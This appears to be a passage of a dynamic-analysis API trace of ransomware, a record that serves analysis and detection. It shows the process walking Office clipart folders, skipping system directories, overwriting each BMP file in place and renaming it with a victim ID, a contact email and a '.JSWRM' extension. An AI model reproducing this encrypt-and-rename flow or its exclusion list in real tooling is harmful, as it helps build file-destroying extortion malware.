lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0080.408] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0080.408] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0080.408] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0080.408] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101864.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101864.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0080.409] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=31968) returned 1 [0080.409] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.409] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7ce0) returned 0x24d210 [0080.410] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7ce0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7ce0, lpOverlapped=0x0) returned 1 [0080.413] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.413] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7ce0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7ce0, lpOverlapped=0x0) returned 1 [0080.413] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0080.414] CloseHandle (hObject=0x314) returned 1 [0080.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0080.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0080.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0080.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0080.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0080.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0080.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0080.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0080.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0080.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0080.415] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0080.415] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0080.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0080.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0080.415] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101864.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101864.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101864.BMP.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101864.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0080.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0080.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0080.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0080.415] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe605048, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe605048, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe605048, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7db8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0101865.BMP", cAlternateFileName="")) returned 1 [0080.415] lstrcmpiW (lpString1="J0101865.BMP", lpString2=".") returned 1 [0080.415] lstrcmpiW (lpString1="J0101865.BMP", lpString2="..") returned 1 [0080.415] lstrcmpiW (lpString1="J0101865.BMP", lpString2="...") returned 1 [0080.415] lstrcmpiW (lpString1="J0101865.BMP", lpString2="windows") returned -1 [0080.415] lstrcmpiW (lpString1="J0101865.BMP", lpString2="recovery") returned -1 [0080.416] lstrcmpiW (lpString1="J0101865.BMP", lpString2="perflogs") returned -1 [0080.416] lstrcmpiW (lpString1="J0101865.BMP", lpString2="documents and settings") returned 1 [0080.416] lstrcmpiW (lpString1="J0101865.BMP", lpString2="$RECYCLE.BIN") returned 1 [0080.416] lstrcmpiW (lpString1="J0101865.BMP", lpString2="system volume information") returned -1 [0080.416] lstrcmpiW (lpString1="J0101865.BMP", lpString2="msocache") returned -1 [0080.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0080.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0101865.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0101865.BMP", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0101865.BMP", lpUsedDefaultChar=0x0) returned 12 [0080.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0080.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0080.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0101865.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0101865.BMP", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0101865.BMP", lpUsedDefaultChar=0x0) returned 12 [0080.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0080.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0080.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0080.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0080.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0080.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0080.416] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101865.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101865.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0080.417] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=32184) returned 1 [0080.417] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.417] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7db0) returned 0x24d210 [0080.418] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7db0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7db0, lpOverlapped=0x0) returned 1 [0080.422] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.422] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7db0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7db0, lpOverlapped=0x0) returned 1 [0080.422] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0080.423] CloseHandle (hObject=0x314) returned 1 [0080.423] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0080.423] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0080.423] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0080.423] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0080.423] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0080.423] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0080.423] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0080.423] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0080.423] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0080.423] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0080.423] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0080.423] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0080.423] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0080.423] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0080.423] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101865.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101865.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101865.BMP.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101865.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0080.424] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0080.424] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0080.424] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0080.424] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe605048, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe605048, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe605048, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7db8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0101866.BMP", cAlternateFileName="")) returned 1 [0080.424] lstrcmpiW (lpString1="J0101866.BMP", lpString2=".") returned 1 [0080.424] lstrcmpiW (lpString1="J0101866.BMP", lpString2="..") returned 1 [0080.424] lstrcmpiW (lpString1="J0101866.BMP", lpString2="...") returned 1 [0080.424] lstrcmpiW (lpString1="J0101866.BMP", lpString2="windows") returned -1 [0080.424] lstrcmpiW (lpString1="J0101866.BMP", lpString2="recovery") returned -1 [0080.424] lstrcmpiW (lpString1="J0101866.BMP", lpString2="perflogs") returned -1 [0080.424] lstrcmpiW (lpString1="J0101866.BMP", lpString2="documents and settings") returned 1 [0080.424] lstrcmpiW (lpString1="J0101866.BMP", lpString2="$RECYCLE.BIN") returned 1 [0080.424] lstrcmpiW (lpString1="J0101866.BMP", lpString2="system volume information") returned -1 [0080.424] lstrcmpiW (lpString1="J0101866.BMP", lpString2="msocache") returned -1 [0080.424] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0080.424] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0101866.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.424] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0101866.BMP", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0101866.BMP", lpUsedDefaultChar=0x0) returned 12 [0080.424] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0080.424] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0080.424] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0101866.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.424] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0101866.BMP", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0101866.BMP", lpUsedDefaultChar=0x0) returned 12 [0080.424] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0080.424] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0080.424] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0080.425] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0080.425] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0080.425] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0080.425] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101866.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101866.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0080.425] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=32184) returned 1 [0080.425] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.425] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7db0) returned 0x24d210 [0080.426] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7db0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7db0, lpOverlapped=0x0) returned 1 [0080.480] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.480] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7db0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7db0, lpOverlapped=0x0) returned 1 [0080.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0080.481] CloseHandle (hObject=0x314) returned 1 [0080.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0080.481] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0080.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0080.481] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0080.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0080.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0080.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0080.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0080.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0080.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0080.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0080.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0080.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0080.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0080.482] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101866.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101866.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101866.BMP.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101866.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0080.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0080.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0080.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0080.483] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe605048, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe605048, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe605048, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7f68, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0101867.BMP", cAlternateFileName="")) returned 1 [0080.483] lstrcmpiW (lpString1="J0101867.BMP", lpString2=".") returned 1 [0080.483] lstrcmpiW (lpString1="J0101867.BMP", lpString2="..") returned 1 [0080.483] lstrcmpiW (lpString1="J0101867.BMP", lpString2="...") returned 1 [0080.483] lstrcmpiW (lpString1="J0101867.BMP", lpString2="windows") returned -1 [0080.483] lstrcmpiW (lpString1="J0101867.BMP", lpString2="recovery") returned -1 [0080.483] lstrcmpiW (lpString1="J0101867.BMP", lpString2="perflogs") returned -1 [0080.483] lstrcmpiW (lpString1="J0101867.BMP", lpString2="documents and settings") returned 1 [0080.483] lstrcmpiW (lpString1="J0101867.BMP", lpString2="$RECYCLE.BIN") returned 1 [0080.483] lstrcmpiW (lpString1="J0101867.BMP", lpString2="system volume information") returned -1 [0080.483] lstrcmpiW (lpString1="J0101867.BMP", lpString2="msocache") returned -1 [0080.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0080.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0101867.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0101867.BMP", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0101867.BMP", lpUsedDefaultChar=0x0) returned 12 [0080.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0080.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0080.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0101867.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0101867.BMP", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0101867.BMP", lpUsedDefaultChar=0x0) returned 12 [0080.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0080.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0080.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0080.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0080.484] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0080.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0080.484] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101867.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101867.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0080.484] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=32616) returned 1 [0080.484] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7f60) returned 0x24d210 [0080.485] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7f60, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7f60, lpOverlapped=0x0) returned 1 [0080.489] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.489] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7f60, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7f60, lpOverlapped=0x0) returned 1 [0080.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0080.490] CloseHandle (hObject=0x314) 